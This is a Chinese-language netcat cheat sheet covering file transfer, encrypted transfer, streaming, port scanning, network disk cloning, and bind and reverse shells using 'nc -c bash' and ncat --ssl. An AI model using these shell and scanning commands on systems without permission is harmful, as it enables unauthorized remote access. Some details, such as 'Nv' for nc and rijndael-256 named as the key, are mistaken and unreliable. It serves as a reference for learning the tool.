基本工具：nc

Nc -h（查询nv可用的参数）
Nv -v(查看连接过程中的详细信息)
Nv -n(后面指定IP地址，如果后面输入域名不会进行DNS解析)

NC用于传输文件

1.Nc -lp 333 > 文件名（随便取名字）//接收端开启侦听端口
2.nc -nv 1【接收端地址】 333 < 需要发送的文件名  -q 1 //输入接收端地址和端口，-q表示接收成功后1秒关闭进程

或者

1.Nc -q 1 -lp 333 < 需要发送的文件名
2.nc -nv【发送端地址】 333 > 文件名

Nc用于传输目录

发送端：tar -cvf - music/ | nc -lp 333 -q 1 //打包music文件夹并打开333端口侦听发送打包后的文件，-q为传输成功后一秒关闭连接


接收端：nc -nv 【发送端地址】 333 | tar -xvf - //接收打包的文件并对其解包

NC用于加密传文件

接收端：nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb >文件名
// 打开并侦听一个端口，通过mcrypt命令进行解密，加密方法为ecb，加密密钥为rijindael-256，--flush为不会在本地保存，加密后重定向到【文件名】


发送端：mcrypt --flush -Fbq -a rijndael-256 -m ecb <[需要发送的文件] | Nc -nv 1.1.1.1 333 -q 1  //通过加密算法加密一个文件（此方法为对称加密），之后连接接收端的端口

NC用于流媒体服务

发送视频端：cat 【视频文件名】 | nc -lp 333 //打开一个视频文件并开启侦听一个端口
接收视频端：nc -nv 【发送端地址】 333 | mplayer -vo xll -cache 3000-   //输入发送端地址和端口号，通过mplayer去播放发送端的视频，最大缓存3000字节，（接收视频端本地不会保存视频，只会实时播放发送端的视频文件）

NC用于端口扫描

Nc -nvz 1.1.1.1 1-65535 //z表示只会扫描端口是否开放，不进行连接
Nc -vnzu 1.1.1.1 1-1024 //默认只会扫描tcp端口，加u表示扫描UDP端口

NC用于远程克隆硬盘

克隆硬盘端：Nc -lp 333 | dd of=/dev/sda
被克隆硬盘端：Dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

NC用于远程控制

正向：
A:nc -lp 333 -c bash
B:nc 1.1.1.1 333


反向：
A：nc -lp 333
B：nc 1.1.1.1 333 -c bash
注：windows用户把bash改为CMD

NC缺点

1.NC缺乏加密和身份验证的能力；（容易被人嗅探）

2.Ncat包含于nmap工具包中；

通过隧道加密通道实现远程控制

A：ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl //被控制端  allow指定允许哪个地址进行连接
B:ncat -nv 1.1.1.1 333 --ssl  //控制端

不同

系统/ 平台的nc参数功能不尽相同